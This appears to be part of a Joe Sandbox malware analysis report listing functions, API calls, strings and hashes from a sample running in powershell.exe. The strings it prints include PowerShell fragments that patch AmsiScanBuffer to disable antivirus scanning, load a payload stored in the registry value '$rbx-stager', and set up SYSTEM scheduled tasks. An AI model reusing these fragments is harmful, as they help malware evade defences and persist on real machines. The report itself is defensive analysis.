RtlPcToFileHeader.NTDLL ref: 00000286D7D191C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00000286D7D187F7), ref: 00000286D7D19209

Strings

csm, xrefs: 00000286D7D191F6

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 7dad71fc742a30e8d325a8eae6b13976bd306b0cca2ac64f61d0170ef9adfcc1
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: B7113D36219B8086EB218F15F448259B7E5F788B98F598220EE8D07B64DF3CC591CB00

Function 00000286D7D11D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000286D7D11D69
HeapAlloc.KERNEL32 ref: 00000286D7D11D77
GetProcessHeap.KERNEL32 ref: 00000286D7D11D9C
HeapFree.KERNEL32 ref: 00000286D7D11DAA

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: e70868f934c29b2d570513af42d0034e86a83edcec284c3cdd38933af4473216
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 9111CC29B06B8081EA25CF6AE80D25977B0FB89FE4F5C8168DE4E53724EF39C442C300

Function 00000286D7D11264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000286D7D1126A
HeapAlloc.KERNEL32 ref: 00000286D7D11279
GetProcessHeap.KERNEL32 ref: 00000286D7D11293
HeapAlloc.KERNEL32 ref: 00000286D7D112A4

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: bb30f2951b71e212274d86ff890bb7038d8d7fd274c2cc55501875b92101e49f
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 7EE092357026049AF7258F62D80D75936E1FB8CF19F44C0A4C90A07350EF7D84DAC761

Function 00000286D7D11000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000286D7D11006
HeapAlloc.KERNEL32 ref: 00000286D7D11015
GetProcessHeap.KERNEL32 ref: 00000286D7D11028
HeapAlloc.KERNEL32 ref: 00000286D7D11037

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 9b2ee867c04a6b8f8a7d8f2dbe3722ef5b2080ab8181f99cc844714b83ec0013
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 74E012757125049BF7299F62DC0D75976E1FB8CF19F44C0A4C90A07310EE3C849AD721

Analysis Process: powershell.exePID: 6324, Parent PID: 5760COMMON

Executed Functions

Function 032AD006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2042219280.00000000032AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_32ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e9568e253ad0bf1c38820154006eda439376f6519026855321efca018931566
Instruction ID: 7e4d80896dae02f136ef29d9ab9ecbc2e243f816a3ebd7e2f0b7991a285f5288
Opcode Fuzzy Hash: 5e9568e253ad0bf1c38820154006eda439376f6519026855321efca018931566
Instruction Fuzzy Hash: E3016D6244D7C09FD7128B258CA4752BFA8EF43320F0984CBE9848F593C2685845C772

Function 032AD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2042219280.00000000032AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_32ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87270502b2a84febe43c3cfe75b0883bea217f5ad3b865af392729a1cc765049
Instruction ID: d3eda72d1f6189c81bb35d15d3147e92b6c9e22647644d4b39ef40c6181730ee
Opcode Fuzzy Hash: 87270502b2a84febe43c3cfe75b0883bea217f5ad3b865af392729a1cc765049
Instruction Fuzzy Hash: B701F731514B40AFE7208A29CC94B67FB98EF41760F088059ED480F682C2B99485DAB2

Analysis Process: powershell.exePID: 3168, Parent PID: 6324COMMON

Execution Graph

Execution Coverage:	74.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.7%
Total number of Nodes:	101
Total number of Limit Nodes:	9

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004011AD Relevance: 42.4, APIs: 20, Strings: 4, Instructions: 356
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
SysAllocString.OLEAUT32(00402234), ref: 004011CC
SysAllocString.OLEAUT32(powershell), ref: 004011D8
SysAllocString.OLEAUT32(?), ref: 004011E0
SysAllocString.OLEAUT32(0040218C), ref: 004011EA
SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
VariantInit.OLEAUT32(?), ref: 00401250
VariantInit.OLEAUT32(?), ref: 004013EA
VariantInit.OLEAUT32(?), ref: 004013F0
VariantInit.OLEAUT32(?), ref: 00401400
CoUninitialize.COMBASE ref: 004014E8
SysFreeString.OLEAUT32(?), ref: 004014FA
SysFreeString.OLEAUT32(00000000), ref: 004014FD
SysFreeString.OLEAUT32(?), ref: 00401502
SysFreeString.OLEAUT32(?), ref: 00401507
SysFreeString.OLEAUT32(?), ref: 0040150C
SysFreeString.OLEAUT32(?), ref: 00401511

Strings

powershell, xrefs: 004011D0
$rbx-svc64, xrefs: 004011C0, 004011C1
$rbx-svc32, xrefs: 004011B6
SYSTEM, xrefs: 004011EC

Memory Dump Source

Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
String ID: $rbx-svc32$$rbx-svc64$SYSTEM$powershell
API String ID: 3960698109-3701805373
Opcode ID: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
Instruction ID: 37100555a8a6d5ebab17ddb862eb0107d88f8e52c3f2eb0dc8ef098a6b7a2dd9
Opcode Fuzzy Hash: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
Instruction Fuzzy Hash: D5C1FC71E00119EFDB00DFA5C988DAEBBB9FF49354B1040A9E905FB2A0DB75AD06CB51

Function 004017A5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818

Part of subcall function 00401868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
Part of subcall function 00401868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
Part of subcall function 00401868: StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF

Part of subcall function 00401674: SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
Part of subcall function 00401674: SysAllocString.OLEAUT32(0040218C), ref: 00401690
Part of subcall function 00401674: CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
Part of subcall function 00401674: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
Part of subcall function 00401674: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
Part of subcall function 00401674: VariantInit.OLEAUT32(?), ref: 004016EE

Part of subcall function 00401674: CoUninitialize.COMBASE ref: 0040177A
Part of subcall function 00401674: SysFreeString.OLEAUT32(?), ref: 0040178C
Part of subcall function 00401674: SysFreeString.OLEAUT32(00000000), ref: 0040178F

Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144

Part of subcall function 004011AD: SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
Part of subcall function 004011AD: SysAllocString.OLEAUT32(00402234), ref: 004011CC
Part of subcall function 004011AD: SysAllocString.OLEAUT32(powershell), ref: 004011D8
Part of subcall function 004011AD: SysAllocString.OLEAUT32(?), ref: 004011E0
Part of subcall function 004011AD: SysAllocString.OLEAUT32(0040218C), ref: 004011EA
Part of subcall function 004011AD: SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
Part of subcall function 004011AD: CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
Part of subcall function 004011AD: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
Part of subcall function 004011AD: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
Part of subcall function 004011AD: VariantInit.OLEAUT32(?), ref: 00401250

Part of subcall function 0040151A: SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
Part of subcall function 0040151A: SysAllocString.OLEAUT32(0040218C), ref: 00401538
Part of subcall function 0040151A: CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
Part of subcall function 0040151A: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
Part of subcall function 0040151A: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
Part of subcall function 0040151A: VariantInit.OLEAUT32(?), ref: 00401594

Strings

$rbx-stager, xrefs: 00401810
SOFTWARE, xrefs: 004017F7
EXE, xrefs: 004017AB
$rbx-svc64, xrefs: 00401835
$rbx-svc32, xrefs: 00401827

Memory Dump Source

Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_powershell.jbxd

Similarity

API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
String ID: $rbx-stager$$rbx-svc32$$rbx-svc64$EXE$SOFTWARE
API String ID: 2402434814-2001424239
Opcode ID: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
Instruction ID: 66d5473efb4f301b2503ca24c6ba2de9d178356673c05167290160cc1cb4c15a
Opcode Fuzzy Hash: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
Instruction Fuzzy Hash: 541191727003156BEB1527725E8DE6B299D9B85794B14443BBA05F62E2EEB8CD00C1A8

Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039

Strings

Microsoft Base Cryptographic Provider v1.0, xrefs: 0040100E

Memory Dump Source

Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_powershell.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID: Microsoft Base Cryptographic Provider v1.0
API String ID: 1815803762-291530887
Opcode ID: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
Instruction ID: b3acd7e835805075c9d1b27062e8bfe6e8ad1c0e86411dcbfca9405e651f33df
Opcode Fuzzy Hash: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
Instruction Fuzzy Hash: C9E0E5726002247BEB304B959E8DF8B3A6CDB80654F200036B704F2190D5B08D00D268

Function 00401868 Relevance: 47.3, APIs: 8, Strings: 19, Instructions: 86
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3

Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144

StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF

Strings

[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 004018B5
LoadLibraryDelegate, xrefs: 00401920
GetProcAddress, xrefs: 00401914
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 004018AE
AmsiPtr, xrefs: 0040195C
[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 004018BD
VirtualProtectPtr, xrefs: 00401950
AmsiScanBufferPtr, xrefs: 00401968
OldProtect, xrefs: 00401974
Get-Delegate, xrefs: 004018D8
[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In, xrefs: 004018C5
function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 0040189D
LoadLibraryPtr, xrefs: 00401944
ParameterTypes, xrefs: 004018E4
NativeMethods, xrefs: 00401908
VirtualProtectDelegate, xrefs: 0040192C
ReturnType, xrefs: 004018F0
TypeBuilder, xrefs: 004018FC
Kernel32Ptr, xrefs: 00401938

Memory Dump Source

Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_powershell.jbxd

Similarity

API ID: Process$Heap$AllocCurrentWow64
String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
API String ID: 2666690646-646820343
Opcode ID: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
Instruction ID: f846a874a752e31dd56dc30a4e6b8ff2ba80a14d39c5350a1e27bccbc54df91f
Opcode Fuzzy Hash: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
Instruction Fuzzy Hash: 6D219D9030292067D5163A621A6A92F980E8BC1B46710C03FB9457F7E9DF7D8F038BDE

Function 004019E1 Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 166
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00008000,75DB2EB0,00000000,00402238), ref: 004019F4
HeapAlloc.KERNEL32(00000000), ref: 00401A01
GetProcessHeap.KERNEL32(00000000,00004000), ref: 00401A15
HeapAlloc.KERNEL32(00000000), ref: 00401A1C

Part of subcall function 00401000: CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
Part of subcall function 00401000: CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
Part of subcall function 00401000: CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039

StrStrIW.KERNELBASE(?,004037F8), ref: 00401A46
StrStrIW.SHLWAPI(00000002,004037F8), ref: 00401A6D
StrNCatW.SHLWAPI(00000000,?,?), ref: 00401A84
StrCatW.SHLWAPI(00000000,004037FC), ref: 00401A90
StrCatW.SHLWAPI(?,'+[Char](), ref: 00401AE8
StrCatW.SHLWAPI(?,?), ref: 00401AF2
StrCatW.SHLWAPI(?,'+'), ref: 00401B1C
StrCatW.SHLWAPI(00000000,?), ref: 00401B2C
StrCatW.SHLWAPI(00000000,004037FC), ref: 00401B47
StrStrIW.SHLWAPI(?,004037F8), ref: 00401B61
StrCatW.SHLWAPI(00000000,?), ref: 00401B75
StrCpyW.SHLWAPI(?,00000000), ref: 00401B7C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B8A
HeapFree.KERNEL32(00000000), ref: 00401B93
GetProcessHeap.KERNEL32(00000000,?), ref: 00401B99
HeapFree.KERNEL32(00000000), ref: 00401B9C

Strings

'+[Char](, xrefs: 00401ADF
'+', xrefs: 00401AFB, 00401B03, 00401B17
)+', xrefs: 00401AF4

Memory Dump Source

Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_powershell.jbxd

Similarity

API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
String ID: '+'$'+[Char]($)+'
API String ID: 3510167801-3465596256
Opcode ID: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
Instruction ID: 881abd296b23407031799d902d2f4cdc89e37ab1eeb299f195f03ae3526d8067
Opcode Fuzzy Hash: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
Instruction Fuzzy Hash: B051F1B1E00219ABCB14DFB4DD49AAE7BBDFB48301B14446AF605F7290DB78DA01DB64

Function 0040151A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
SysAllocString.OLEAUT32(0040218C), ref: 00401538
CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
VariantInit.OLEAUT32(?), ref: 00401594
VariantInit.OLEAUT32(?), ref: 00401609
CoUninitialize.COMBASE ref: 00401659
SysFreeString.OLEAUT32(00000000), ref: 00401666
SysFreeString.OLEAUT32(?), ref: 0040166B

Strings

$rbx-svc64, xrefs: 0040152A, 0040152B
$rbx-svc32, xrefs: 00401520

Memory Dump Source

Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
String ID: $rbx-svc32$$rbx-svc64
API String ID: 2407135876-384997928
Opcode ID: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
Instruction ID: a7557972db62563d574e16152cd358301487189799b80a26eca7dc015dd46a94
Opcode Fuzzy Hash: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
Instruction Fuzzy Hash: FE414471E00219AFDB01EFA4CD899AFBBBDEF49314B140469FA05FB290C6B59D45CB60

Function 00401674 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
SysAllocString.OLEAUT32(0040218C), ref: 00401690
CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
VariantInit.OLEAUT32(?), ref: 004016EE
CoUninitialize.COMBASE ref: 0040177A
SysFreeString.OLEAUT32(?), ref: 0040178C
SysFreeString.OLEAUT32(00000000), ref: 0040178F

Strings

$rbx-svc32, xrefs: 0040167A, 00401685

Memory Dump Source

Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: $rbx-svc32
API String ID: 4184240511-186198907
Opcode ID: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
Instruction ID: fe73214060e0a71e5cb08311afe73f66ef618dc69d1aaa4bc8de0f8b6e607afc
Opcode Fuzzy Hash: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
Instruction Fuzzy Hash: 85314471A00218AFDB01EFA8CD88DAF7B7DEF49354B104069FA05FB190C6B5AD05CBA4

Function 00401986 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Get-Delegate,00000000,00402238), ref: 00401999
StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 004019B5
StrStrIW.SHLWAPI(?,Get-Delegate,75DB2EB0), ref: 004019D2

Strings

Get-Delegate, xrefs: 00401995, 004019B3, 004019C9

Memory Dump Source

Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_400000_powershell.jbxd

Similarity

API ID: lstrlen
String ID: Get-Delegate
API String ID: 1659193697-1365458365
Opcode ID: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
Instruction ID: 00c31201c37e283d491a5759d1d7e9797cf0b304d52834bac4b81ed49e19cba9
Opcode Fuzzy Hash: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
